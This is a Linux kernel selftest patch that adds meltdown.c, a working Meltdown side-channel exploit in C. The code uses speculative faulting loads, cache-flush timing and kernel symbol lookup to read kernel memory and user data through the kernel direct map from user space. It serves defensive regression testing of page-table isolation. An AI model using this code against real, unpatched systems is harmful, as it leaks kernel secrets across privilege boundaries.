[v2] selftest/x86/meltdown: Add a selftest for meltdown

Message ID Y8n8YTgjSIw4speQ@ziqianlu-desk1
State New
Headers
Series [v2] selftest/x86/meltdown: Add a selftest for meltdown |

Commit Message

Aaron Lu Jan. 20, 2023, 2:28 a.m. UTC
  To capture potential programming errors, such as mistakenly setting the
Global bit on kernel page table entries, add a selftest for meltdown.

This selftest is based on
https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown.c

In addition to the existing test, which reads the kernel variable
saved_command_line from user space, this adds one more test that reads a
user local variable through its kernel direct map address. For the
existing test to report a failure, both the high kernel mapping and the
low kernel mapping have to be leaked; for the added test, a leak of the
low kernel mapping alone is enough to trigger a failure, so both tests
are useful.

Test results of 10 runs:

On v6.1-rc8 with nopti kernel cmdline option:

host              test_out_rate_1    test_out_rate_2
lkp-bdw-de1            50%               100%
lkp-hsw-d01            70%               100%
lkp-hsw-d02             0%                80%
lkp-hsw-d03            60%               100%
lkp-hsw-d04            20%               100%
lkp-hsw-d05            60%               100%
lkp-ivb-d01             0%                70%
lkp-kbl-d01           100%               100%
lkp-skl-d02           100%                90%
lkp-skl-d03            90%               100%
lkp-skl-d05            60%               100%
kbl-vm                100%                80%
2 other machines have 0% rate for both tests.

bdw=broadwell, hsw=haswell, ivb=ivybridge, etc.

test_out_rate_1: how often the test of reading saved_command_line from
user space reports a failure;
test_out_rate_2: how often the test of reading a user local variable
through its kernel direct map address from user space reports a failure.

On v5.19 without nopti cmdline option:
host              test_out_rate_2
lkp-bdw-de1            80%
lkp-hsw-4ex1           50%
lkp-hsw-d01            30%
lkp-hsw-d03            10%
lkp-hsw-d04            10%
lkp-kbl-d01            10%
kbl-vm                 80%
7 other machines have 0% rate for test2.

Also tested on an i386 VM with 512M of memory: with v6.1-rc8 and nopti
added to the kernel cmdline, the test out rate is 100%.

Main changes I made from ltp's meltdown test:
- Replace rdtscll() and clflush() with kernel's implementation;
- Reimplement find_symbol_in_file() to avoid bringing in LTP's library
  functions;
- Coding style changes: placing the function return type in the same
  line of the function.

Signed-off-by: Aaron Lu <aaron.lu@intel.com>
Reviewed-by: Pavel Boldin <boldin.pavel@gmail.com>
---
v2: add Pavel Boldin's reviewed-by tag.

 tools/testing/selftests/x86/Makefile   |   2 +-
 tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++
 2 files changed, 530 insertions(+), 1 deletion(-)
 create mode 100644 tools/testing/selftests/x86/meltdown.c
  

Patch

diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0388c4d60af0..36f99c360a56 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -13,7 +13,7 @@  CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie)
 TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \
 			check_initial_reg_state sigreturn iopl ioperm \
 			test_vsyscall mov_ss_trap \
-			syscall_arg_fault fsgsbase_restore sigaltstack
+			syscall_arg_fault fsgsbase_restore sigaltstack meltdown
 TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
 			test_FCMOV test_FCOMI test_FISTTP \
 			vdso_restorer
diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c
new file mode 100644
index 000000000000..fcb211dc9038
--- /dev/null
+++ b/tools/testing/selftests/x86/meltdown.c
@@ -0,0 +1,529 @@ 
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (c) 2018 Pavel Boldin <pboldin@cloudlinux.com>
+ * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown.c
+ */
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <stdarg.h>
+#include <string.h>
+#include <signal.h>
+#include <ucontext.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <ctype.h>
+#include <sys/utsname.h>
+#include <sys/mman.h>
+
+/* Page geometry used by virt_to_phys(): 4 KiB pages. */
+#define PAGE_SHIFT	12
+#define PAGE_SIZE	(1UL << PAGE_SHIFT)
+/* The direct map base read from the page table dump is rounded down to 1 GiB. */
+#define PUD_SHIFT	30
+#define PUD_SIZE	(1UL << PUD_SHIFT)
+#define PUD_MASK	(~(PUD_SIZE - 1))
+
+/* Start of the kernel direct map; filled in by get_directmap_base(). */
+static unsigned long directmap_base;
+
+/*
+ * Layout of the probe array: one TARGET_SIZE-byte slot per value of the
+ * leaked bit. TARGET_OFFSET has to stay in sync with the literal "shl $9"
+ * in speculate().
+ */
+#define TARGET_OFFSET	9
+#define TARGET_SIZE	(1 << TARGET_OFFSET)
+#define BITS_BY_READ	2
+
+/*
+ * Read the time-stamp counter, with an lfence on either side of rdtsc.
+ *
+ * Returns the 64-bit counter assembled from EDX (high half) and EAX (low
+ * half).
+ */
+static inline uint64_t rdtsc(void)
+{
+	uint32_t lo, hi;
+
+	/*
+	 * The leading lfence waits (on Intel CPUs) until all previous
+	 * instructions have been executed; the trailing one makes sure rdtsc
+	 * itself has executed before any subsequent instruction.
+	 */
+	__asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(lo), "=d"(hi));
+
+	return ((uint64_t)hi << 32) | lo;
+}
+
+/* Execute clflush on the byte that @__p points to. */
+static inline void clflush(volatile void *__p)
+{
+	volatile char *line = __p;
+
+	/* "+m" tells the compiler the byte is both read and written here. */
+	__asm__ __volatile__("clflush %0" : "+m" (*line));
+}
+
+/* Probe array: one TARGET_SIZE-byte slot for each value a leaked bit can take. */
+static char target_array[BITS_BY_READ * TARGET_SIZE];
+
+/* Run clflush() on the first byte of every slot of target_array. */
+static void clflush_target(void)
+{
+	char *slot = target_array;
+	char *end = target_array + sizeof(target_array);
+
+	for (; slot < end; slot += TARGET_SIZE)
+		clflush(slot);
+}
+
+/*
+ * Labels defined inside the inline assembly of speculate(): failshere marks
+ * the load that is expected to fault, stopspeculate the instruction at which
+ * sigsegv() resumes execution.
+ */
+extern char failshere[];
+extern char stopspeculate[];
+
+/*
+ * Try to leak one bit of the byte at @addr into the cache state of
+ * target_array.
+ *
+ * @addr: address of the byte to read. The load at failshere is expected to
+ *        fault, in which case sigsegv() resumes at stopspeculate.
+ * @bit:  index of the bit to extract; it is pinned to %cl because it serves
+ *        as the rotate count.
+ *
+ * The loaded byte is rotated right by @bit, masked down to one bit and
+ * shifted left by 9 (TARGET_OFFSET), so a set bit yields an offset of
+ * TARGET_SIZE and the final load touches the second slot of target_array.
+ * A zero result jumps back to label 1 instead, so without a fault the
+ * sequence only ends once the bit reads as 1.
+ *
+ * NOTE(review): the 300 dependent adds in front of the load presumably keep
+ * the pipeline busy so the faulting load retires late - confirm.
+ */
+static void __attribute__((noinline)) speculate(unsigned long addr, char bit)
+{
+	register char mybit asm ("cl") = bit;
+#ifdef __x86_64__
+	asm volatile (
+		"1:\n\t"
+
+		".rept 300\n\t"
+		"add $0x141, %%rax\n\t"
+		".endr\n"
+
+		"failshere:\n\t"
+		"movb (%[addr]), %%al\n\t"
+		"ror %[bit], %%rax\n\t"
+		"and $1, %%rax\n\t"
+		"shl $9, %%rax\n\t"
+		"jz 1b\n\t"
+
+		"movq (%[target], %%rax, 1), %%rbx\n"
+
+		"stopspeculate: \n\t"
+		"nop\n\t"
+		:
+		: [target] "r" (target_array),
+		  [addr] "r" (addr),
+		  [bit] "r" (mybit)
+		: "rax", "rbx"
+	);
+#else /* defined(__x86_64__) */
+	asm volatile (
+		"1:\n\t"
+
+		".rept 300\n\t"
+		"add $0x141, %%eax\n\t"
+		".endr\n"
+
+		"failshere:\n\t"
+		"movb (%[addr]), %%al\n\t"
+		"ror %[bit], %%eax\n\t"
+		"and $1, %%eax\n\t"
+		"shl $9, %%eax\n\t"
+		"jz 1b\n\t"
+
+		"movl (%[target], %%eax, 1), %%ebx\n"
+
+		"stopspeculate: \n\t"
+		"nop\n\t"
+		:
+		: [target] "r" (target_array),
+		  [addr] "r" (addr),
+		  [bit] "r" (mybit)
+		/* Name the clobbers as the 32-bit registers this branch uses. */
+		: "eax", "ebx"
+	);
+#endif
+}
+
+#ifdef __i386__
+/* On i386 the saved instruction pointer is indexed by REG_EIP. */
+# define REG_RIP	REG_EIP
+#endif
+
+/*
+ * SIGSEGV handler: a fault at failshere is expected and is skipped by moving
+ * the saved instruction pointer to stopspeculate; a fault anywhere else is
+ * reported and aborts the program.
+ */
+static void sigsegv(int sig, siginfo_t *siginfo, void *context)
+{
+	ucontext_t *uc = context;
+	unsigned long *ip = (unsigned long *)&uc->uc_mcontext.gregs[REG_RIP];
+
+	if (*ip == (unsigned long)failshere) {
+		*ip = (unsigned long)stopspeculate;
+		return;
+	}
+
+	printf("Segmentation fault at unexpected location %lx\n", *ip);
+	abort();
+}
+
+/*
+ * Install sigsegv() as the SIGSEGV handler.
+ *
+ * Returns whatever sigaction() returns; main() treats a negative value as
+ * failure.
+ */
+static int set_signal(void)
+{
+	struct sigaction sa;
+
+	/* Everything except the handler and SA_SIGINFO stays zeroed. */
+	memset(&sa, 0, sizeof(sa));
+	sa.sa_sigaction = sigsegv;
+	sa.sa_flags = SA_SIGINFO;
+
+	return sigaction(SIGSEGV, &sa, NULL);
+}
+
+/*
+ * Time a single one-byte read of @addr.
+ *
+ * Returns the difference between the rdtsc() readings taken right before and
+ * right after the read, converted to int.
+ */
+static inline int get_access_time(volatile char *addr)
+{
+	volatile int sink __attribute__((__unused__));
+	unsigned long long before, after;
+
+	before = rdtsc();
+	sink = *addr;	/* volatile on both sides so the access is not dropped */
+	after = rdtsc();
+
+	return after - before;
+}
+
+/* Access times at or below this value count as cache hits. */
+static int cache_hit_threshold;
+/* hist[i] counts how often slot i of target_array was read that fast. */
+static int hist[BITS_BY_READ];
+
+/*
+ * Time one read of every slot of target_array and bump the matching hist[]
+ * counter for each slot whose access time is within cache_hit_threshold.
+ */
+static void check(void)
+{
+	int slot;
+
+	for (slot = 0; slot < BITS_BY_READ; slot++) {
+		volatile char *probe = &target_array[slot * TARGET_SIZE];
+
+		if (get_access_time(probe) > cache_hit_threshold)
+			continue;
+
+		hist[slot]++;
+	}
+}
+
+/* Number of flush/speculate/measure rounds used to read one bit. */
+#define CYCLES 10000
+
+/*
+ * Read bit @bit of the byte at @addr through the cache side channel.
+ *
+ * @fd:   file whose first bytes are re-read before every attempt; a failed
+ *        read is reported but does not stop the measurement.
+ * @addr: address of the byte to leak.
+ * @bit:  bit index handed to speculate().
+ *
+ * Returns 1 if the slot for a set bit (hist[1]) was found cached in more
+ * than a tenth of the CYCLES rounds, 0 otherwise.
+ */
+static int readbit(int fd, unsigned long addr, char bit)
+{
+	int i, ret;
+	static char buf[256];
+
+	memset(hist, 0, sizeof(hist));
+
+	for (i = 0; i < CYCLES; i++) {
+		/*
+		 * Make the to-be-stolen data cache and tlb hot
+		 * to increase success rate.
+		 */
+		ret = pread(fd, buf, sizeof(buf), 0);
+		if (ret < 0)
+			printf("[INFO]\tCan't read fd\n");
+
+		clflush_target();
+
+		speculate(addr, bit);
+		check();
+	}
+
+	return hist[1] > CYCLES / 10;
+}
+
+/*
+ * Assemble the byte at @addr from eight readbit() calls, least significant
+ * bit first. @fd is passed through to readbit().
+ *
+ * Returns the reconstructed value.
+ */
+static int readbyte(int fd, unsigned long addr)
+{
+	int value = 0;
+	int pos;
+
+	for (pos = 0; pos < 8; pos++) {
+		if (readbit(fd, addr, pos))
+			value |= 1 << pos;
+	}
+
+	return value;
+}
+
+/*
+ * Integer square root estimate: start from val / 2 and refine with at most
+ * 100 averaging steps, stopping early once a step no longer changes the
+ * guess. For val of 0 or 1 the initial guess of 0 is returned unchanged.
+ */
+static int mysqrt(long val)
+{
+	int guess = val / 2;
+	int last = 0;
+	int iter;
+
+	for (iter = 0; iter < 100 && guess != last; iter++) {
+		last = guess;
+		guess = (val / guess + guess) / 2;
+	}
+
+	return guess;
+}
+
+/* Number of timed reads per calibration pass. */
+#define ESTIMATE_CYCLES	1000000
+
+/*
+ * Calibrate cache_hit_threshold.
+ *
+ * After one pass whose timings are discarded, the average access time of
+ * target_array is measured once with plain repeated reads and once with a
+ * clflush() before every read. The threshold is mysqrt() of the product of
+ * the two averages; all three numbers are printed.
+ */
+static void set_cache_hit_threshold(void)
+{
+	long hit_avg = 0, miss_avg = 0;
+	long round;
+
+	/* Warm-up pass: the timings are taken but not used. */
+	for (round = 0; round < ESTIMATE_CYCLES; round++)
+		(void)get_access_time(target_array);
+
+	for (round = 0; round < ESTIMATE_CYCLES; round++)
+		hit_avg += get_access_time(target_array);
+	hit_avg /= ESTIMATE_CYCLES;
+
+	for (round = 0; round < ESTIMATE_CYCLES; round++) {
+		clflush(target_array);
+		miss_avg += get_access_time(target_array);
+	}
+	miss_avg /= ESTIMATE_CYCLES;
+
+	cache_hit_threshold = mysqrt(hit_avg * miss_avg);
+
+	printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n",
+		hit_avg, miss_avg, cache_hit_threshold);
+}
+
+/*
+ * Look up @symname in a symbol table file whose lines have the form
+ * "<hex address> <type char> <name>", as parsed from /proc/kallsyms and
+ * System.map by the callers.
+ *
+ * The file is read line by line: lines that do not match the format are
+ * skipped and anything after the name on a line is ignored, so the scan
+ * always ends at end of file.
+ *
+ * Returns the address of the first matching symbol, or 0 if the file cannot
+ * be opened or the symbol is not found.
+ */
+static unsigned long find_symbol_in_file(const char *filename, const char *symname)
+{
+	char line[4096], name[4096];
+	unsigned long addr, found = 0;
+	FILE *fp;
+
+	fp = fopen(filename, "r");
+	if (!fp) {
+		printf("[INFO]\tFailed to open %s\n", filename);
+		return 0;
+	}
+
+	while (fgets(line, sizeof(line), fp)) {
+		/* The type character is not needed, so it is parsed and dropped. */
+		if (sscanf(line, "%lx %*c %4095s", &addr, name) != 2)
+			continue;
+
+		if (!strcmp(name, symname)) {
+			found = addr;
+			break;
+		}
+	}
+
+	fclose(fp);
+
+	return found;
+}
+
+/*
+ * Resolve the kernel symbol @name: try /proc/kallsyms first and fall back to
+ * /boot/System.map-<release>, with <release> taken from uname().
+ *
+ * Returns the symbol address, or 0 if neither source yields one.
+ */
+static unsigned long find_kernel_symbol(const char *name)
+{
+	struct utsname uts;
+	char map_path[256];
+	unsigned long addr = find_symbol_in_file("/proc/kallsyms", name);
+
+	if (addr != 0)
+		return addr;
+
+	if (uname(&uts) < 0)
+		return 0;
+
+	snprintf(map_path, sizeof(map_path), "/boot/System.map-%s", uts.release);
+	return find_symbol_in_file(map_path, name);
+}
+
+/* Address of the kernel variable saved_command_line, from the symbol table. */
+static unsigned long saved_cmdline_addr;
+/* File that readbit() re-reads before every attempt of the running test. */
+static int spec_fd;
+
+/* Upper bound on the number of command line bytes that are compared. */
+#define READ_SIZE 32
+
+/* Leak @len bytes starting at @addr into @dst, one readbyte() call per byte. */
+static void leak_bytes(int fd, unsigned long addr, char *dst, size_t len)
+{
+	size_t i;
+
+	for (i = 0; i < len; i++)
+		dst[i] = readbyte(fd, addr + i);
+}
+
+/*
+ * Try to read the kernel command line from user space.
+ *
+ * The pointer stored in the kernel variable saved_command_line is leaked
+ * first, then up to READ_SIZE bytes of the string it points to. The result
+ * is compared byte by byte with what /proc/cmdline returns.
+ *
+ * Returns -1 if more than half of the compared bytes match (leak found),
+ * 0 if no leak was found or the test had to be skipped.
+ */
+static int test_read_saved_command_line(void)
+{
+	char leaked[READ_SIZE] = { 0 };
+	char expected[READ_SIZE] = { 0 };
+	unsigned int i, score = 0;
+	unsigned long addr;
+	int expected_len, ret;
+
+	saved_cmdline_addr = find_kernel_symbol("saved_command_line");
+	if (!saved_cmdline_addr) {
+		printf("[SKIP]\tCan not find symbol saved_command_line\n");
+		return 0;
+	}
+	printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr);
+
+	spec_fd = open("/proc/cmdline", O_RDONLY);
+	if (spec_fd == -1) {
+		printf("[SKIP]\tCan not open /proc/cmdline\n");
+		return 0;
+	}
+
+	expected_len = pread(spec_fd, expected, sizeof(expected), 0);
+	if (expected_len < 0) {
+		printf("[SKIP]\tCan't read /proc/cmdline\n");
+		/* Do not leave the descriptor open on the skip path. */
+		close(spec_fd);
+		return 0;
+	}
+
+	/* Leak the pointer value stored at saved_cmdline_addr. */
+	leak_bytes(spec_fd, saved_cmdline_addr, leaked, sizeof(addr));
+	memcpy(&addr, leaked, sizeof(addr));
+	memset(leaked, 0, sizeof(leaked));
+	printf("[INFO]\tsaved_command_line: 0x%lx\n", addr);
+
+	/* A zero pointer means nothing was leaked; the score stays at 0. */
+	if (addr) {
+		leak_bytes(spec_fd, addr, leaked, expected_len);
+
+		for (i = 0; i < (unsigned int)expected_len; i++)
+			if (expected[i] == leaked[i])
+				score++;
+	}
+
+	if (score > (unsigned int)expected_len / 2) {
+		printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n");
+		ret = -1;
+	} else {
+		printf("[OK]\ttest_read_saved_command_line: no leak found.\n");
+		ret = 0;
+	}
+
+	close(spec_fd);
+
+	return ret;
+}
+
+/*
+ * Find the start of the kernel direct map in
+ * /sys/kernel/debug/page_tables/kernel.
+ *
+ * The address is parsed from the line that follows the first line containing
+ * "Kernel Mapping" and is stored in directmap_base after masking it with
+ * PUD_MASK.
+ *
+ * Returns 0 on success, -1 if the file cannot be opened or no address could
+ * be parsed.
+ */
+static int get_directmap_base(void)
+{
+	char *line = NULL;
+	size_t cap = 0;
+	int ret = -1;
+	FILE *fp;
+
+	fp = fopen("/sys/kernel/debug/page_tables/kernel", "r");
+	if (!fp)
+		return -1;
+
+	while (getline(&line, &cap, fp) != -1) {
+		if (strstr(line, "Kernel Mapping") == NULL)
+			continue;
+
+		/* The first entry after the marker line carries the address. */
+		if (getline(&line, &cap, fp) == -1)
+			continue;
+		if (sscanf(line, "0x%lx", &directmap_base) != 1)
+			continue;
+
+		printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
+		directmap_base &= PUD_MASK;
+		ret = 0;
+		break;
+	}
+
+	fclose(fp);
+	free(line);
+	return ret;
+}
+
+/*
+ * Translate the user virtual address @virt of the calling process into a
+ * physical address by reading its entry in /proc/self/pagemap.
+ *
+ * @virt: virtual address to translate.
+ * @phys: receives the physical address on success; untouched on failure.
+ *
+ * Bit 63 of the entry is taken as the "present" flag and bits 0-54 as the
+ * page frame number. A PFN of 0 is treated as "not allowed to see the PFN".
+ *
+ * Returns 0 on success, -1 on any failure (a reason is printed).
+ */
+static int virt_to_phys(unsigned long virt, unsigned long *phys)
+{
+	unsigned long pfn;
+	uint64_t val;
+	ssize_t nread;
+	int fd, ret = -1;
+
+	fd = open("/proc/self/pagemap", O_RDONLY);
+	if (fd == -1) {
+		printf("[INFO]\tFailed to open pagemap\n");
+		return -1;
+	}
+
+	/* A short read leaves val partly unset, so treat it as a failure too. */
+	nread = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t));
+	if (nread != (ssize_t)sizeof(val)) {
+		printf("[INFO]\tFailed to read pagemap\n");
+		goto out;
+	}
+
+	if (!(val & (1ULL << 63))) {
+		printf("[INFO]\tPage not present according to pagemap\n");
+		goto out;
+	}
+
+	pfn = val & ((1ULL << 55) - 1);
+	if (pfn == 0) {
+		printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
+		goto out;
+	}
+
+	*phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+	ret = 0;
+
+out:
+	close(fd);
+	return ret;
+}
+
+/*
+ * Try to read user data back through its kernel direct map address.
+ *
+ * A known string is written to a shared mapping of a temporary file, the
+ * physical address of that page is looked up with virt_to_phys(), and the
+ * bytes are then read with readbyte() at directmap_base + physical address.
+ *
+ * Returns 1 if the string was read back completely (leak found), 0 if no
+ * leak was found or the test had to be skipped. All resources acquired here
+ * are released on every path.
+ */
+static int test_read_local_var(void)
+{
+	char path[] = "/tmp/meltdown.XXXXXX";
+	char string[] = "test string";
+	void *p = MAP_FAILED;
+	char *result = NULL;
+	unsigned long phys;
+	int i, len, ret = 0;
+
+	if (get_directmap_base() == -1) {
+		printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n");
+		return 0;
+	}
+
+	spec_fd = mkstemp(path);
+	if (spec_fd == -1) {
+		printf("[SKIP]\tCan not open %s\n", path);
+		return 0;
+	}
+	/* The open descriptor keeps the file usable; do not leave it in /tmp. */
+	unlink(path);
+
+	if (ftruncate(spec_fd, 0x1000) == -1) {
+		printf("[SKIP]\tCan not resize %s\n", path);
+		goto out;
+	}
+
+	p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0);
+	if (p == MAP_FAILED) {
+		printf("[SKIP]\tmmap spec_fd failed\n");
+		goto out;
+	}
+	memcpy(p, string, sizeof(string));
+
+	if (virt_to_phys((unsigned long)p, &phys) == -1) {
+		printf("[SKIP]\tCan not convert virtual address to physical address\n");
+		goto out;
+	}
+
+	len = strlen(string);
+	result = calloc(len + 1, 1);
+	if (!result) {
+		printf("[SKIP]\tNot enough memory for malloc\n");
+		goto out;
+	}
+
+	/* A byte that reads as 0 cannot match the string, so stop early. */
+	for (i = 0; i < len; i++, phys++) {
+		result[i] = readbyte(spec_fd, directmap_base + phys);
+		if (result[i] == 0)
+			break;
+	}
+
+	ret = !strncmp(string, result, len);
+	if (ret)
+		printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n");
+	else
+		printf("[OK]\ttest_read_local_var: no leak found.\n");
+
+out:
+	free(result);
+	if (p != MAP_FAILED)
+		munmap(p, 0x1000);
+	close(spec_fd);
+
+	return ret;
+}
+
+/*
+ * Calibrate the cache timing threshold, install the SIGSEGV handler and run
+ * both leak tests.
+ *
+ * Returns -1 if either test reports a leak, 0 otherwise (including when the
+ * handler cannot be installed and the run is skipped).
+ */
+int main(void)
+{
+	int local_var_failed, cmdline_failed;
+
+	printf("[RUN]\tTest if system is vulnerable to meltdown\n");
+
+	set_cache_hit_threshold();
+
+	/*
+	 * NOTE(review): writing to every byte presumably makes sure the probe
+	 * array is backed by its own pages before the tests run - confirm.
+	 */
+	memset(target_array, 1, sizeof(target_array));
+
+	if (set_signal() < 0) {
+		printf("[SKIP]\tCan not set handler for segfault\n");
+		return 0;
+	}
+
+	local_var_failed = test_read_local_var();
+	cmdline_failed = test_read_saved_command_line();
+
+	return (local_var_failed || cmdline_failed) ? -1 : 0;
+}